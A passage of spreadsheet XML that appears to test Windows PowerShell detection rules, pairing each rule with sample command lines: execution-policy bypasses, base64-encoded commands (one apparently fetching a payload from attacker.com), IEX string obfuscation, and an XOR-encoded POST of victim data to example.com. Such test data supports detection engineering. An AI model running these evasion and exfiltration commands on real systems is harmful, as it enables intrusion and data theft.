    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E63" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="44" t="n"/>
      <c r="J63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C64" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D64" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E64" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FilE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="44" t="n"/>
      <c r="J64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C65" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D65" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E65" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="44" t="n"/>
      <c r="J65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="n"/>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="n"/>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C68" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D68" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E68" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="44" t="n"/>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="44" t="n"/>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E71" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -EncodedCommand V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="43" t="n"/>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="n"/>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="43" t="n"/>
      <c r="J74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcuTiOnPOLiCY Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="43" t="n"/>
      <c r="J75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E76" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCutiONPolICY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="43" t="n"/>
      <c r="J76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C77" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D77" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E77" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="n"/>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="43" t="n"/>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C80" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D80" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E80" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="44" t="n"/>
      <c r="J80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="44" t="n"/>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="43" t="n"/>
      <c r="J82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E84" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="43" t="n"/>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C86" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D86" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E86" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="43" t="n"/>
      <c r="J86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
for	($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="43" t="n"/>
      <c r="J87" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E88" s="44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F88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E89" s="4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89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E90" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
